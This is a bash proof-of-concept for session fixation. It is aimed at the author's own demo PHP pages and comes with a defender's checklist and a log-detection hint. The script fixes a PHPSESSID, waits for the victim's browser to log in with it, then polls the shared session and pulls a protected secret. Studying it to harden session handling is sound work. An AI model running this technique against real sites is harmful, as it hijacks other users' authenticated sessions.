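#!/bin/bash
#
# SESSION FIXATION POC - Francesco 'ascii' Ongaro
#
# Proof of concept against the demo pages under
# ascii.ush.it/hack-sessionfixationpoc/. The vulnerable page adopts a
# PHPSESSID supplied by the client and keeps that same id after the user
# logs in, so whoever chose the id (this script) ends up sharing the
# authenticated session. The "safe.php" variant (commented out below) is the
# reference for a page that does not have the problem.
#
# What the server side should do so this PoC fails (defender's checklist):
#   - regenerate the session id on every privilege change, e.g. PHP's
#     session_regenerate_id(true) right after a successful login;
#   - refuse session ids the server never issued itself
#     (PHP: session.use_strict_mode=1);
#   - do not read the session id from the query string
#     (PHP: session.use_only_cookies=1).
# Detection hint: a session id that first appears in a query string and is
# later seen authenticated is the trace this script leaves in access logs.
#
# Usage: run the script, open the printed URL in a browser that holds no
# cookies for the host, press enter, then log in from that browser. The
# script polls the fixed session once per second and prints the secret as
# soon as the session becomes authenticated.
#
# Exit status: 0 when the polling loop ends, 1 if no session id could be
# obtained from the server.

set -u

# HREF="http://ascii.ush.it/hack-sessionfixationpoc/safe.php";
HREF="http://ascii.ush.it/hack-sessionfixationpoc/vulnerable.php"
readonly HREF

# Upper bound on polling iterations (one per second).
readonly MAX_POLLS=1000000

#######################################
# Obtain a fresh session id from the server.
# Globals:   HREF (read)
# Outputs:   the value of the first Set-Cookie header, without attributes
#            or the trailing CR of the HTTP header line, on stdout
# Returns:   0 on success; 1 if no Set-Cookie header was seen
#######################################
fetch_session_id() {
  local sess
  # Only the first Set-Cookie line is used so that a server issuing several
  # cookies cannot turn the id into a multi-line value; the CR is stripped
  # because HTTP header lines end in CRLF and cut does not remove it.
  sess=$(curl "$HREF" -Is \
    | grep -i -m 1 "Set-Cookie: " \
    | cut -d "=" -f2 \
    | cut -d ";" -f1 \
    | tr -d '\r')
  [[ -n "$sess" ]] || return 1
  printf '%s\n' "$sess"
}

#######################################
# Fetch the page state for a session: the "Hits:" and "Level:" lines,
# joined into one line.
# Globals:   HREF (read)
# Arguments: $1 - session id to present as PHPSESSID
# Outputs:   joined state line on stdout (may be empty)
#######################################
poll_state() {
  local sess=$1
  local buf
  buf=$(curl "$HREF?PHPSESSID=$sess" -H 'Connection: close' -s \
    | grep "^Hits\|^Level")
  # Join the matched lines with single spaces.
  printf '%s\n' "${buf//$'\n'/ }"
}

#######################################
# Ask the page for the secret using the (now authenticated) session.
# Globals:   HREF (read)
# Arguments: $1 - session id to present as PHPSESSID
# Outputs:   the "The secret is ..." line on stdout, or nothing
#######################################
fetch_secret() {
  local sess=$1
  curl "$HREF?PHPSESSID=$sess&showmethesecret=yeees" \
    -H 'Connection: close' -s \
    | grep "^The secret is"
}

main() {
  local sess usr old_usr buf action_buf i

  # SESS="deadbeefcacacacacacacacacacacacb"; // on some servers you can just issue an arbitrary session
  if ! sess=$(fetch_session_id); then
    printf 'Unable to obtain a session id from %s\n' "$HREF" >&2
    exit 1
  fi

  printf "\nSESSION FIXATION POC - Francesco 'ascii' Ongaro\n\n"
  printf 'Point your browser to: '
  printf '%s?PHPSESSID=%s\n' "$HREF" "$sess"
  printf 'IT HAS TO BE A CLEAN BROWSER WITH NO COOKIES! Now press enter..\n'
  read -r _

  printf 'Loading please wait..\n'
  usr=0
  for ((i = 1; i <= MAX_POLLS; i++)); do
    buf=$(poll_state "$sess")
    printf '%s\n' "[ii] sess[$sess]buf[$buf]"
    old_usr=$usr
    # Everything from "Hits:" up to "Level: " is dropped, leaving the level
    # the server reports for this session.
    usr=$(printf '%s\n' "$buf" | sed 's/Hits:.*Level: //g')
    if [[ "$usr" != "$old_usr" ]]; then
      printf '%s\n' "[WW] [wow we changed state] $usr"
      action_buf=$(fetch_secret "$sess")
      if [[ -n "$action_buf" ]]; then
        printf '%s\n' "[FF] WOW!"
        printf '%s\n' "$action_buf"
        break
      else
        printf '%s\n' "[EE] Unable to retrive the secret!"
      fi
    fi
    sleep 1
  done
}

main "$@"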

